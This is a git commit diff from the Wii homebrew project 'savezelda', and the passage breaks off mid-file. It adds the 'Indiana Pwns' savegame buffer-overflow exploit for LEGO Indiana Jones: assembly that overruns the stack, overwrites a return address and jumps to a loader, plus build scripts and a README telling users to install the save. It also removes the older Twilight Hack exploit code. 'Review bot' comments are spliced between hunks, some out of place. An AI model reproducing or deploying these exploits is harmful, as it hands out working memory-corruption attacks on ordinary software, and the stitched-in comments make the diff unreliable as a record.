From: Segher Boessenkool Date: Thu, 4 Jun 2009 07:17:38 +0000 (+0200) Subject: LEGO Indiana Jones X-Git-Url: http://wien.tomnetworks.com/gitweb/?p=savezelda.git;a=commitdiff_plain;h=e1ede7aa2cb1840add9ba88901c7495deb2b37e3 LEGO Indiana Jones --- diff --git a/.gitignore b/.gitignore index f63dbb7..3350594 100644 --- a/.gitignore +++ b/.gitignore @@ -1,14 +1,3 @@ *.o .version - -rzd?-?.?.bin -rzd?.data - -rzd??.elf -rzd??.slot - -title.bin - -zero16k -FAILURE diff --git a/Makefile b/Makefile index 278c630..a5a5120 100644 --- a/Makefile +++ b/Makefile 
@@ -41,111 +41,22 @@ else endif -targets := rzde-3.2.bin rzde-3.3.bin rzde-3.4.bin -targets += rzdj-3.2.bin rzdj-3.3.bin rzdj-3.4.bin -targets += rzdp-3.2.bin rzdp-3.3.bin rzdp-3.4.bin -targets-short := rzde rzdj rzdp - -objs := twilight.o - -ppms := $(targets-short:%=%-icon.ppm) generic-banner.ppm -assets := title.bin $(ppms) - -loader := loader/loader.bin - - -titleid = $(shell perl titleid.pl $(1)) - - -# System menu 3.3 checks for the exploit, when a) you copy a save from SD, -# and b) when the menu starts up; but for a) it only looks at the first -# zeldaTp.dat file, and for b) it allows any file of non-aligned length. -# -# System menu 3.4 only looks at the last file in the wad when installing. -# -# System menu 4.0 finally avoids such silly bugs. - -define twintig - D=$(call titleid,$(1)); \ - $(TOOLS)/twintig $$D $@ toc-$1 -endef - - -all: $(targets) - -$(filter %-3.2.bin,$(targets)): %-3.2.bin: %.data -$(filter %-3.3.bin,$(targets)): %-3.3.bin: %.data zero16k -$(filter %-3.4.bin,$(targets)): %-3.4.bin: %.data FAILURE -$(targets): %.bin: toc-% $(assets) - @echo " TWINTIG $@" - $(Q)$(call twintig,$*) - -saves := $(targets-short:%=%.data) - -rzde.data: rzde0.slot rzde2.slot -rzdp.data: rzdp0.slot -rzdj.data: rzdj0.slot -$(saves): $(loader) - @echo " ZELDAPACK $@" - $(Q)./pack.sh $@ $(filter %.slot,$^) - $(Q)$(TOOLS)/zelda-cksum $@ - $(Q)cat $(loader) >> $@ - $(Q)printf '\0' >> $@ - -slots := rzde0.slot rzde2.slot rzdj0.slot rzdp0.slot - -$(slots): %.slot: %.elf - @echo " OBJCOPY $@" - $(Q)$(OBJCOPY) -Obinary $< $@ - -elfs := $(slots:.slot=.elf) - -rzde0.elf: baddr := 0x8046a3e0+0 -rzde2.elf: baddr := 0x804519e0+0x0a94 -rzdj0.elf: baddr := 0x8044f860+0 -rzdp0.elf: baddr := 0x804522e0+0 -$(elfs): %.elf: twilight.lds %.o $(objs) - @echo " LINK $@" - $(Q)$(LD) --defsym baddr=$(baddr) -T $^ -o $@ - -exploit-objs := $(elfs:.elf=.o) - -$(exploit-objs): slot-name := Twilight Hack -rzde0.o: slot-name := TwilightHack0 -rzde2.o: slot-name := TwilightHack2 
-$(exploit-objs): %.o: start.S head.b - @echo " ASSEMBLE $@" - $(Q)$(CC) $(CFLAGS) -D NAME="$(slot-name)" -c $< -o $@ - -%.o: %.c - @echo " COMPILE $@" - $(Q)$(CC) $(CFLAGS) -c $< -o $@ - -title.bin: .version - @echo " TITLEBIN $@" - $(Q)perl make-title-bin.pl > $@ +all: .version: FORCE $(Q)./describe.sh > .$@-tmp $(Q)cmp -s $@ .$@-tmp || cp .$@-tmp $@ $(Q)rm .$@-tmp -$(ppms): %.ppm: %.png - @echo " PPM $@" - $(Q)convert $< $@ - -zero16k: - $(Q)dd if=/dev/zero bs=16384 count=1 2>/dev/null > $@ - -FAILURE: - $(Q)echo FAILURE > $@ - -$(loader): FORCE .version +all: FORCE .version $(Q)$(MAKE) -C loader + $(Q)$(MAKE) -C twilight + $(Q)$(MAKE) -C lego FORCE: clean: - -rm -f $(targets) $(saves) $(elfs) $(exploit-objs) $(objs) $(slots) - -rm -f .version title.bin zero16k FAILURE + -rm -f .version $(MAKE) -C loader clean + $(MAKE) -C twilight clean + $(MAKE) -C lego clean diff --git a/generic-banner.png b/generic-banner.png deleted file mode 100644 index 536d357..0000000 Binary files a/generic-banner.png and /dev/null differ diff --git a/generic-banner.ppm b/generic-banner.ppm deleted file mode 100644 index 7ed37aa..0000000 Binary files a/generic-banner.ppm and /dev/null differ diff --git a/head.b b/head.b deleted file mode 100644 index 7241dfb..0000000 Binary files a/head.b and /dev/null differ diff --git a/lego/.gitignore b/lego/.gitignore new file mode 100644 index 0000000..bcbbaf2 --- /dev/null +++ b/lego/.gitignore @@ -0,0 +1,5 @@ +rli?.bin +FILE_V28 +exploit.bin +exploit.elf +title.bin diff --git a/lego/Makefile b/lego/Makefile new file mode 100644 index 0000000..b1fe162 --- /dev/null +++ b/lego/Makefile 
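Review bot: The bare `all:` header added just before the `.version: FORCE` rule reads like a leftover, but it is presumably what keeps `all` the default goal now that the old `all: $(targets)` at the top of the rule section is gone; state that explicitly, either with `# Listed first so that 'all' stays the default goal.` above it or by replacing it with `.DEFAULT_GOAL := all`. The new `all: FORCE .version` rule now has a recipe, so a stray file named `all` (or `clean`) would be taken for an up-to-date target; add `.PHONY: all clean FORCE` next to the rules. The enclosing `ifeq` that this hunk's `else`/`endif` context closes starts outside the hunk.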
@@ -0,0 +1,117 @@ +# Copyright 2008-2009 Segher Boessenkool +# This code is licensed to you under the terms of the GNU GPL, version 2; +# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt + + +# Configuration: + +# What toolchain prefix should we use +CROSS ?= broadway- + +# Where are the tools (http://git.infradead.org/users/segher/wii.git) +TOOLS ?= $(HOME)/wii/segher + +# End of configuration. + + + +# Set CC, LD, OBJCOPY based on CROSS, unless they are set already + +ifeq ($(origin CC), default) + CC := $(CROSS)gcc -m32 +endif +ifeq ($(origin LD), default) + LD := $(CROSS)ld +endif +OBJCOPY ?= $(CROSS)objcopy + + +# The compiler flags we need. + +CFLAGS := -Wall -W -Os -ffreestanding -mno-eabi -mno-sdata -mcpu=750 + + +# Build with "V=1" to see the commands executed; be quiet otherwise. + +ifeq ($(V),1) + Q := +else + Q := @ + MAKEFLAGS += --no-print-directory +endif + + +targets := rlie.bin rlij.bin rlip.bin + +ppms := $(targets:%.bin=%-icon.ppm) rli-banner.ppm +assets := title.bin $(ppms) + +loader := ../loader/loader.bin + + +titleid = $(shell perl titleid.pl $(1)) + + +define twintig + D=$(call titleid,$(1)); \ + $(TOOLS)/twintig $$D $@ toc-$1 +endef + + +all: $(targets) + +$(targets): %.bin: toc-% FILE_V28 $(assets) + @echo " TWINTIG $@" + $(Q)$(call twintig,$*) + +FILE_V28: head.bin exploit.bin $(loader) + @echo " LEGOSTACK $@" + $(Q)./pack.sh $@ $^ + $(Q)$(TOOLS)/lego-cksum $@ 32688 + +head.bin: head.elf + @echo " OBJCOPY $@" + $(Q)$(OBJCOPY) -Obinary $< $@ + +exploit.bin: exploit.elf + @echo " OBJCOPY $@" + $(Q)$(OBJCOPY) -Obinary $< $@ + +exploit.elf: baddr := 0x903b0780 +exploit.elf: lego.lds exploit.o + @echo " LINK $@" + $(Q)$(LD) --defsym baddr=$(baddr) -T $^ -o $@ + +head.elf: head.lds head.o + @echo " LINK $@" + $(Q)$(LD) -T $^ -o $@ + +exploit.o: exploit.s + @echo " ASSEMBLE $@" + $(Q)$(CC) $(CFLAGS) -c $< -o $@ + +head.o: head.s head.b + @echo " ASSEMBLE $@" + $(Q)$(CC) $(CFLAGS) -c $< -o $@ + +title.bin: ../.version + 
@echo " TITLEBIN $@" + $(Q)perl make-title-bin.pl > $@ + +../.version: FORCE + $(Q)$(MAKE) -C .. .version + +$(ppms): %.ppm: %.png + @echo " PPM $@" + $(Q)convert $< $@ + +$(loader): FORCE + $(Q)$(MAKE) -C ../loader + +FORCE: + +clean: + -rm -f $(targets) FILE_V28 + -rm -f exploit.bin exploit.elf exploit.o + -rm -f head.bin head.elf head.o + -rm -f title.bin diff --git a/lego/README b/lego/README new file mode 100644 index 0000000..1fd8677 --- /dev/null +++ b/lego/README @@ -0,0 +1,7 @@ +Extremely short instructions: put this savegame on your Wii (if you have +one on there already that you want to keep, back it up first!), start the +game, walk to the "art room" (find some walkthrough on the intertubes if +you cannot find it), look at the second character, enjoy! + +Kudos to "roto" for finding the original buffer overflow, and many thanks +for doing lots of testing! diff --git a/lego/exploit.s b/lego/exploit.s new file mode 100644 index 0000000..acc423c --- /dev/null +++ b/lego/exploit.s @@ -0,0 +1,31 @@ +# Copyright 2008-2009 Segher Boessenkool +# This code is licensed to you under the terms of the GNU GPL, version 2; +# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt + + .section .start,"ax" + +start: + # Set up a stack frame. + lis 1,0x8080 ; li 0,0 ; stwu 0,-64(1) + + # Stop audio and video. + lis 0,audio_stop@h ; ori 0,0,audio_stop@l ; mtctr 0 ; bctrl + lis 0,video_stop@h ; ori 0,0,video_stop@l ; mtctr 0 ; bctrl + + # Move code into place; a generous 32kB, starting at 64kB in + # the save file. + + lis 3,main@h ; ori 3,3,main@l ; addi 5,3,-4 + lis 4,0x806c ; lwz 4,0xdc48-0x10000(4) ; addi 4,4,-4 + addis 4,4,1 ; addi 4,4,end-start + li 0,0x2000 ; mtctr 0 +0: lwzu 0,4(4) ; stwu 0,4(5) ; bdnz 0b + + # Sync caches on it. + li 0,0x0400 ; mtctr 0 ; mr 5,3 +0: dcbst 0,5 ; sync ; icbi 0,5 ; addi 5,5,0x20 ; bdnz 0b + sync ; isync + + # Go for it! + mtctr 3 ; bctr +end: 
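Review bot: `CFLAGS := -Wall -W -Os -ffreestanding -mno-eabi -mno-sdata -mcpu=750` puts the flags the freestanding build cannot do without into the user-overridable variable, so `make CFLAGS=-g` on the command line silently drops `-ffreestanding`, `-mno-eabi`, `-mno-sdata` and `-mcpu=750`; keep them apart, e.g. `CFLAGS ?= -Wall -W -Os` and `ALL_CFLAGS := -ffreestanding -mno-eabi -mno-sdata -mcpu=750 $(CFLAGS)`, and use `$(ALL_CFLAGS)` in the two ASSEMBLE recipes. `all`, `clean` and `FORCE` are not files and should be declared with `.PHONY: all clean FORCE`. The `32688` passed to `$(TOOLS)/lego-cksum` in the `FILE_V28` recipe is an unexplained constant; a short comment saying what it is (an offset or a length, presumably) would spare the next reader a trip into the tool's source. twilight/Makefile in this commit has the same `CFLAGS :=` and missing `.PHONY` declaration.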
diff --git a/lego/head.b b/lego/head.b new file mode 100644 index 0000000..1bcf35a Binary files /dev/null and b/lego/head.b differ diff --git a/lego/head.lds b/lego/head.lds new file mode 100644 index 0000000..04c1555 --- /dev/null +++ b/lego/head.lds @@ -0,0 +1,22 @@ +/* Copyright 2008-2009 Segher Boessenkool + This code is licensed to you under the terms of the GNU GPL, version 2; + see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt */ + +OUTPUT_FORMAT("elf32-powerpc") +OUTPUT_ARCH(powerpc:common) + +SECTIONS { +/* audio_stop = 0x800a3e80; + video_stop = 0x800b2120; + + main = 0x90000020; */ + + .head 0x805a909c : + { + head.o(.start) + *(.text) + *(.rodata .rodata.*) + *(.data) + *(.bss) + } +} diff --git a/lego/head.s b/lego/head.s new file mode 100644 index 0000000..0232fd0 --- /dev/null +++ b/lego/head.s @@ -0,0 +1,26 @@ + .section ".start", "ax" + + # FIXME + bptr = 0x806bdc48 + +0: + .incbin "head.b" + + # Smack the stack. + .long 0x11111111, 0x11111111, 0x11111111, 0x11111111 + .long 0x11111111, 0x11111111, 0x11111111, 0x11111111 + .long 0x11111111, 0x11111111, 0x11111111, 0x11111111 + .long 0x11111111, 0x11111111, 0x11111111, 0x11111111 + .long 0x11111111, 0x11111111, 0x11111111, 0x11111111 + .long 0x11111111, 0x11111111, 0x11111111, 0x11111111 + .long 0x11111111, 0x11111111, 0x11111111, 0x11111111 + .long 0x11111111, 0x11111111, 0x11111111, 0x11111111 + .long 0x11111111 + + # Return address; namely... + .long 0x805b0f30, 0x11111111, 0x11111111, 0x11111111 + + # Here. + lis 3,bptr@ha ; lwz 3,bptr@l(3) ; addis 3,3,1 ; mtctr 3 ; bctr + + .fill 0x10000 - (. - 0b) diff --git a/lego/lego.lds b/lego/lego.lds new file mode 100644 index 0000000..417f36a --- /dev/null +++ b/lego/lego.lds 
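Review bot: The commented-out block `/* audio_stop = 0x800a3e80; video_stop = 0x800b2120; main = 0x90000020; */` inside `SECTIONS` is dead text: those symbols are defined in lego.lds, which is the script exploit.elf is linked with, and nothing in head.s as shown here refers to them. Delete the block, or replace it with a one-line comment such as `/* head.elf defines no external symbols; see lego.lds for exploit.elf. */` so the next reader does not wonder whether it is meant to be enabled.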
@@ -0,0 +1,22 @@ +/* Copyright 2008-2009 Segher Boessenkool + This code is licensed to you under the terms of the GNU GPL, version 2; + see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt */ + +OUTPUT_FORMAT("elf32-powerpc") +OUTPUT_ARCH(powerpc:common) + +SECTIONS { + audio_stop = 0x800a3e80; + video_stop = 0x800b2120; + + main = 0x90000020; + + .twilight baddr : + { + rli*.o(.start) + *(.text) + *(.rodata .rodata.*) + *(.data) + *(.bss) + } +} diff --git a/lego/make-title-bin.pl b/lego/make-title-bin.pl new file mode 100755 index 0000000..a91ae98 --- /dev/null +++ b/lego/make-title-bin.pl @@ -0,0 +1,16 @@ +#!/usr/bin/perl +sub printline { + my $x = shift; + chomp $x; + $x .= "\0" x 32; + $x = substr $x, 0, 32; + $x =~ s/(.)/\0$1/g; + + print $x; +} + +$name = "Indiana Pwns, by Team Twiizers"; +$version = `cat ../.version`; + +printline $name; +printline $version; diff --git a/lego/pack.sh b/lego/pack.sh new file mode 100755 index 0000000..57a388b --- /dev/null +++ b/lego/pack.sh @@ -0,0 +1,3 @@ +#!/bin/bash +TARGET=$1; shift +cat $* /dev/zero | dd bs=1024 count=128 2>/dev/null > $TARGET diff --git a/lego/rli-banner.png b/lego/rli-banner.png new file mode 100644 index 0000000..dfbea83 Binary files /dev/null and b/lego/rli-banner.png differ diff --git a/lego/rli-banner.ppm b/lego/rli-banner.ppm new file mode 100644 index 0000000..238737f Binary files /dev/null and b/lego/rli-banner.ppm differ diff --git a/lego/rlie-icon.png b/lego/rlie-icon.png new file mode 100644 index 0000000..116c466 Binary files /dev/null and b/lego/rlie-icon.png differ diff --git a/lego/rlie-icon.ppm b/lego/rlie-icon.ppm new file mode 100644 index 0000000..684db4a Binary files /dev/null and b/lego/rlie-icon.ppm differ diff --git a/lego/rlij-icon.png b/lego/rlij-icon.png new file mode 100644 index 0000000..b7b17ed Binary files /dev/null and b/lego/rlij-icon.png differ 
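Review bot: The input-section pattern `rli*.o(.start)` matches no object this script is linked with: lego/Makefile links `exploit.elf` from `lego.lds exploit.o`, so exploit.o's `.start` is not assigned to `.twilight` and ends up placed by ld's orphan-section rules (it presumably lands right after `.twilight` at `baddr`, which would be why the link still works). The pattern looks copied from twilight.lds's `rzd*.o(.start)`; write `exploit.o(.start)` so the placement is stated rather than accidental. The output-section name `.twilight` in the lego script is likewise a leftover from the copy, though renaming it is cosmetic.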
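Review bot: This script is identical to twilight/make-title-bin.pl later in this commit except for the `$name` literal, so one shared script taking the title as an argument (`my $name = shift;`) would keep the two from drifting apart. `$version = \`cat ../.version\`` shells out for a one-line read; `open my $fh, '<', '../.version' or die "$!";` with `my $version = <$fh>;` does the same without a subprocess and fails loudly when the file is missing, where the backtick form silently yields an empty string. The file also lacks `use strict; use warnings;`, which would have flagged the undeclared globals.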
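Review bot: `dd bs=1024 count=128` reading from a pipe counts every short read as one block, so when cat's writes do not line up with dd's reads the output can come out shorter than 128 KiB instead of being padded to exactly that size; `cat "$@" /dev/zero | head -c 131072 > "$TARGET"` (or `dd iflag=fullblock` with GNU dd) gives a fixed-size file. Quoting `"$@"` and `"$TARGET"` in the same line also stops word splitting and glob expansion of the paths. A missing input makes cat print an error but the pipeline status is dd's, so the Makefile would not notice; a check such as `for f in "$@"; do [ -r "$f" ] || exit 1; done` before the pipeline closes that gap.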
diff --git a/lego/rlij-icon.ppm b/lego/rlij-icon.ppm new file mode 100644 index 0000000..f1c9c55 Binary files /dev/null and b/lego/rlij-icon.ppm differ diff --git a/lego/rlip-icon.png b/lego/rlip-icon.png new file mode 100644 index 0000000..bab2887 Binary files /dev/null and b/lego/rlip-icon.png differ diff --git a/lego/rlip-icon.ppm b/lego/rlip-icon.ppm new file mode 100644 index 0000000..5cda2e7 Binary files /dev/null and b/lego/rlip-icon.ppm differ diff --git a/lego/titleid.pl b/lego/titleid.pl new file mode 100755 index 0000000..f735f1d --- /dev/null +++ b/lego/titleid.pl @@ -0,0 +1,2 @@ +#!/usr/bin/perl +print "00010000", map { sprintf "%02x", ord uc } split //, $ARGV[0]; diff --git a/lego/toc-rlie b/lego/toc-rlie new file mode 100644 index 0000000..6ae5c54 --- /dev/null +++ b/lego/toc-rlie @@ -0,0 +1,4 @@ +title.bin +rli-banner.ppm +rlie-icon.ppm +FILE_V28 FILE_V28 diff --git a/lego/toc-rlij b/lego/toc-rlij new file mode 100644 index 0000000..b7aeb08 --- /dev/null +++ b/lego/toc-rlij @@ -0,0 +1,4 @@ +title.bin +rli-banner.ppm +rlij-icon.ppm +FILE_V28 FILE_V28 diff --git a/lego/toc-rlip b/lego/toc-rlip new file mode 100644 index 0000000..c69f791 --- /dev/null +++ b/lego/toc-rlip @@ -0,0 +1,4 @@ +title.bin +rli-banner.ppm +rlip-icon.ppm +FILE_V28 FILE_V28 diff --git a/loader/main.c b/loader/main.c index 62f6aa6..223b26b 100644 --- a/loader/main.c +++ b/loader/main.c @@ -5,8 +5,8 @@ #include "loader.h" -u8 *code_buffer = (u8 *)0x90100000; -u8 *trampoline_buffer = (u8 *)0x80001800; +static u8 *const code_buffer = (u8 *)0x90100000; +static u8 *const trampoline_buffer = (u8 *)0x80001800; static void dsp_reset(void) { @@ -107,7 +107,7 @@ int main(void) video_init(); usbgecko_init(); - printf("Twilight Hack %s\n", version); + printf("savezelda %s\n", version); printf("\n"); printf("Copyright 2008,2009 Segher Boessenkool\n"); printf("Copyright 2008 Haxx Enterprises\n"); diff --git a/make-title-bin.pl b/make-title-bin.pl deleted file mode 100755 index 4b6ec87..0000000 
--- a/make-title-bin.pl +++ /dev/null @@ -1,16 +0,0 @@ -#!/usr/bin/perl -sub printline { - my $x = shift; - chomp $x; - $x .= "\0" x 32; - $x = substr $x, 0, 32; - $x =~ s/(.)/\0$1/g; - - print $x; -} - -$name = "Twilight Hack by Team Twiizers"; -$version = `cat .version`; - -printline $name; -printline $version; diff --git a/pack.sh b/pack.sh deleted file mode 100755 index b1aa666..0000000 --- a/pack.sh +++ /dev/null @@ -1,8 +0,0 @@ -#!/bin/bash -out=$1; shift -dd if=/dev/zero bs=1 count=$((0x4000)) of=$out 2>/dev/null -start=0 -for save in $@; do - dd if=$save of=$out bs=1 seek=$start conv=notrunc 2>/dev/null - start=$((start+0xa94)) -done diff --git a/rzde-icon.png b/rzde-icon.png deleted file mode 100644 index 7e753c9..0000000 Binary files a/rzde-icon.png and /dev/null differ diff --git a/rzde-icon.ppm b/rzde-icon.ppm deleted file mode 100644 index e695ee7..0000000 Binary files a/rzde-icon.ppm and /dev/null differ diff --git a/rzdj-icon.png b/rzdj-icon.png deleted file mode 100644 index 4f865f8..0000000 Binary files a/rzdj-icon.png and /dev/null differ diff --git a/rzdj-icon.ppm b/rzdj-icon.ppm deleted file mode 100644 index 94ce235..0000000 Binary files a/rzdj-icon.ppm and /dev/null differ diff --git a/rzdp-icon.png b/rzdp-icon.png deleted file mode 100644 index d6f9263..0000000 Binary files a/rzdp-icon.png and /dev/null differ diff --git a/rzdp-icon.ppm b/rzdp-icon.ppm deleted file mode 100644 index 4088e74..0000000 Binary files a/rzdp-icon.ppm and /dev/null differ diff --git a/start.S b/start.S deleted file mode 100644 index 5d453aa..0000000 --- a/start.S +++ /dev/null 
@@ -1,35 +0,0 @@ -// Copyright 2008-2009 Segher Boessenkool -// This code is licensed to you under the terms of the GNU GPL, version 2; -// see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt - -#define XSTR(x) #x -#define ISTR(x) XSTR(x) - - .section .start,"ax" - - // Uninteresting stuff. - .incbin "head.b" - - // "Link". This is displayed on the load menu, so make it nice. -0: .ascii ISTR(NAME) - .fill 17 - (. - 0b) - - // "Epona". Hungry horse eats the stack. - .fill 0xe8,1,'3' - - // The return address on the stack. - .long start - - // Align things properly -- there's code after this. - .fill 7,1,'S' - .balign 4,0 - -start: - // Set up a stack frame. - lis 1,0x8080 ; li 0,0 ; stwu 0,-64(1) - - // Pass the address we are called from, to determine region. - mflr 3 - - // Go for it! - b main diff --git a/titleid.pl b/titleid.pl deleted file mode 100755 index f735f1d..0000000 --- a/titleid.pl +++ /dev/null @@ -1,2 +0,0 @@ -#!/usr/bin/perl -print "00010000", map { sprintf "%02x", ord uc } split //, $ARGV[0]; diff --git a/toc-rzde-3.2 b/toc-rzde-3.2 deleted file mode 100644 index 07bf1a4..0000000 --- a/toc-rzde-3.2 +++ /dev/null @@ -1,4 +0,0 @@ -title.bin -generic-banner.ppm -rzde-icon.ppm -rzde.data zeldaTp.dat diff --git a/toc-rzde-3.3 b/toc-rzde-3.3 deleted file mode 100644 index 03d7fa5..0000000 --- a/toc-rzde-3.3 +++ /dev/null @@ -1,5 +0,0 @@ -title.bin -generic-banner.ppm -rzde-icon.ppm -zero16k zeldaTp.dat -rzde.data zeldaTp.dat diff --git a/toc-rzde-3.4 b/toc-rzde-3.4 deleted file mode 100644 index 30c4035..0000000 --- a/toc-rzde-3.4 +++ /dev/null @@ -1,5 +0,0 @@ -title.bin -generic-banner.ppm -rzde-icon.ppm -rzde.data zeldaTp.dat -FAILURE FAILURE diff --git a/toc-rzdj-3.2 b/toc-rzdj-3.2 deleted file mode 100644 index fdab09e..0000000 --- a/toc-rzdj-3.2 +++ /dev/null @@ -1,4 +0,0 @@ -title.bin -generic-banner.ppm -rzdj-icon.ppm -rzdj.data zeldaTp.dat 
diff --git a/toc-rzdj-3.3 b/toc-rzdj-3.3 deleted file mode 100644 index 133d563..0000000 --- a/toc-rzdj-3.3 +++ /dev/null @@ -1,5 +0,0 @@ -title.bin -generic-banner.ppm -rzdj-icon.ppm -zero16k zeldaTp.dat -rzdj.data zeldaTp.dat diff --git a/toc-rzdj-3.4 b/toc-rzdj-3.4 deleted file mode 100644 index d32c4f8..0000000 --- a/toc-rzdj-3.4 +++ /dev/null @@ -1,5 +0,0 @@ -title.bin -generic-banner.ppm -rzdj-icon.ppm -rzdj.data zeldaTp.dat -FAILURE FAILURE diff --git a/toc-rzdp-3.2 b/toc-rzdp-3.2 deleted file mode 100644 index e58ce07..0000000 --- a/toc-rzdp-3.2 +++ /dev/null @@ -1,4 +0,0 @@ -title.bin -generic-banner.ppm -rzdp-icon.ppm -rzdp.data zeldaTp.dat diff --git a/toc-rzdp-3.3 b/toc-rzdp-3.3 deleted file mode 100644 index bbdb572..0000000 --- a/toc-rzdp-3.3 +++ /dev/null @@ -1,5 +0,0 @@ -title.bin -generic-banner.ppm -rzdp-icon.ppm -zero16k zeldaTp.dat -rzdp.data zeldaTp.dat diff --git a/toc-rzdp-3.4 b/toc-rzdp-3.4 deleted file mode 100644 index e642bf4..0000000 --- a/toc-rzdp-3.4 +++ /dev/null @@ -1,5 +0,0 @@ -title.bin -generic-banner.ppm -rzdp-icon.ppm -rzdp.data zeldaTp.dat -FAILURE FAILURE diff --git a/twilight.c b/twilight.c deleted file mode 100644 index 9ce9a2b..0000000 --- a/twilight.c +++ /dev/null 
@@ -1,222 +0,0 @@ -// Copyright 2008-2009 Segher Boessenkool -// This code is licensed to you under the terms of the GNU GPL, version 2; -// see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt - -#undef DEBUG_GECKO -#undef DEBUG_BLINK - -typedef unsigned int u32; -typedef unsigned char u8; - -int nand_open_E0(const char *path, void *buf, u32 mode); -int nand_open_E2(const char *path, void *buf, u32 mode); -int nand_open_J0(const char *path, void *buf, u32 mode); -int nand_open_P0(const char *path, void *buf, u32 mode); - -int nand_read_E0(void *buf, void *dest, u32 len); -int nand_read_E2(void *buf, void *dest, u32 len); -int nand_read_J0(void *buf, void *dest, u32 len); -int nand_read_P0(void *buf, void *dest, u32 len); - -void audio_stop_E0(void); -void audio_stop_E2(void); -void audio_stop_J0(void); -void audio_stop_P0(void); - -void graphics_stop_E0(void); -void graphics_stop_E2(void); -void graphics_stop_J0(void); -void graphics_stop_P0(void); - -static u8 nand_buf[0x100] __attribute__ ((aligned(0x40))); - -#ifdef DEBUG_GECKO -void gecko_print(void *, const char *); - -#define PRINT(x) gecko_print(0, x) -#define HEX(x) hex(x) - -static void hex(u32 x) -{ - u32 i; - u32 digit; - char s[10]; - - for (i = 0; i < 8; i++) { - digit = x >> 28; - x <<= 4; - s[i] = digit + '0' + (digit < 10 ? 
0 : 'a' - 10 - '0'); - } - s[8] = '\n'; - s[9] = 0; - PRINT(s); -} -#else -#define PRINT(x) do { } while (0) -#define HEX(x) do { } while (0) -#endif - -static void sync_cache(void *p, u32 n) -{ - u32 start, end; - - start = (u32)p & ~31; - end = ((u32)p + n + 31) & ~31; - n = (end - start) >> 5; - - while (n--) { - asm("dcbst 0,%0 ; icbi 0,%0" : : "b"(p)); - p += 32; - } - asm("sync ; isync"); -} - -static void sync_before_read(void *p, u32 n) -{ - u32 start, end; - - start = (u32)p & ~31; - end = ((u32)p + n + 31) & ~31; - n = (end - start) >> 5; - - while (n--) { - asm("dcbf 0,%0" : : "b"(p)); - p += 32; - } - asm("sync"); -} - -static void jump(void *p, u32 arg) -{ - PRINT("taking the plunge...\n"); - - asm("mr 3,%1 ; mtctr %0 ; bctrl" : : "r"(p), "r"(arg) : "r3"); - - PRINT("whoops, payload returned to us\n"); -} - -#ifdef DEBUG_BLINK -static u32 read32(u32 addr) -{ - u32 x; - - asm volatile("lwz %0,0(%1) ; sync" : "=r"(x) : "b"(0xc0000000 | addr)); - - return x; -} - -static void write32(u32 addr, u32 x) -{ - asm("stw %0,0(%1) ; eieio" : : "r"(x), "b"(0xc0000000 | addr)); -} - -static void blink(u32 colour) -{ - u32 *fb = (u32 *)0xC0F00000; - u32 i; - - // blink tray led - write32(0x0d8000c0, read32(0x0d8000c0) ^ 0x20); - - for (i = 0; i < 640*576/2; i++) - fb[i] = colour; -} -#else -#define blink(x) do { } while(0) -#endif - -void __attribute__ ((noreturn)) main(u32 baddr) -{ - int ret, i, len; - char *area; - char *gameid = (char *)0x80000000; - int (*nand_open)(const char *path, void *buf, u32 mode); - int (*nand_read)(void *buf, void *dest, u32 len); - void (*audio_stop)(void); - void (*graphics_stop)(void); - - PRINT("Hello, Brave New World!\n"); - - baddr -= 0x2c0; - - switch (gameid[3]) { - case 'E': - if ((baddr>>16) == 0x8045) { - nand_open = nand_open_E2; - nand_read = nand_read_E2; - audio_stop = audio_stop_E2; - graphics_stop = graphics_stop_E2; - } else { - nand_open = nand_open_E0; - nand_read = nand_read_E0; - audio_stop = audio_stop_E0; - 
graphics_stop = graphics_stop_E0; - } - break; - case 'P': - nand_open = nand_open_P0; - nand_read = nand_read_P0; - audio_stop = audio_stop_P0; - graphics_stop = graphics_stop_P0; - break; - case 'J': - nand_open = nand_open_J0; - nand_read = nand_read_J0; - audio_stop = audio_stop_J0; - graphics_stop = graphics_stop_J0; - break; - default: - PRINT("unsupported game region\n"); - for (;;) - ; - } - - audio_stop(); - graphics_stop(); - - blink(0x266a26c0); // maroon - - ret = nand_open("zeldaTp.dat", nand_buf, 1); - - blink(0x7140718a); // olive - - PRINT("nand open --> "); - HEX(ret); - - area = (void *)0x90000020; - - // Skip past save game, to loader.bin - ret = nand_read(nand_buf, area, 0x4000); - - len = 0; - for (i = 0; i < 0x40; i++) { - PRINT("reading bootloader page: "); - HEX(i); - - blink(0x40804080 + i*0x02000200); // grey - - sync_before_read(area + 0x1000*i, 0x1000); - ret = nand_read(nand_buf, area + 0x1000*i, 0x1000); - len += ret; - - blink(0x552b5515 + i*0x02000200); // lime - - PRINT("--> "); - HEX(ret); - PRINT("\n"); - } - - for (i = 0; i < 0x100; i++) - HEX(((u32 *)area)[i]); - - blink(0xc399c36a); // sky blue - - sync_cache(area, len); - jump(area, 0x123); - - blink(0x4c544cff); // red - - PRINT("(shouldn't happen)\n"); - for (;;) - ; -} diff --git a/twilight.lds b/twilight.lds deleted file mode 100644 index a871cdc..0000000 --- a/twilight.lds +++ /dev/null 
@@ -1,40 +0,0 @@ -/* Copyright 2008-2009 Segher Boessenkool - This code is licensed to you under the terms of the GNU GPL, version 2; - see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt */ - -OUTPUT_FORMAT("elf32-powerpc") -OUTPUT_ARCH(powerpc:common) - -SECTIONS { - gecko_print = 0x802facf0; - - nand_open_E0 = 0x80371f50; - nand_read_E0 = 0x80371710; - audio_stop_E0 = 0x8034607c; - graphics_stop_E0 = 0x8035c930; - - nand_open_E2 = 0x8035c988; - nand_read_E2 = 0x8035c148; - audio_stop_E2 = 0x80330a4c; - graphics_stop_E2 = 0x80347368; - - nand_open_P0 = 0x8035cdb8; - nand_read_P0 = 0x8035c578; - audio_stop_P0 = 0x80330e7c; - graphics_stop_P0 = 0x80347798; - - nand_open_J0 = 0x8035e440; - nand_read_J0 = 0x8035dc00; - audio_stop_J0 = 0x8033256c; - graphics_stop_J0 = 0x80348e20; - - .twilight baddr : - { - rzd*.o(.start) - *(.text) - *(.rodata .rodata.*) - *(.data) - *(.bss) - . = 0x0a94; - } -} diff --git a/twilight/.gitignore b/twilight/.gitignore new file mode 100644 index 0000000..31b1b14 --- /dev/null +++ 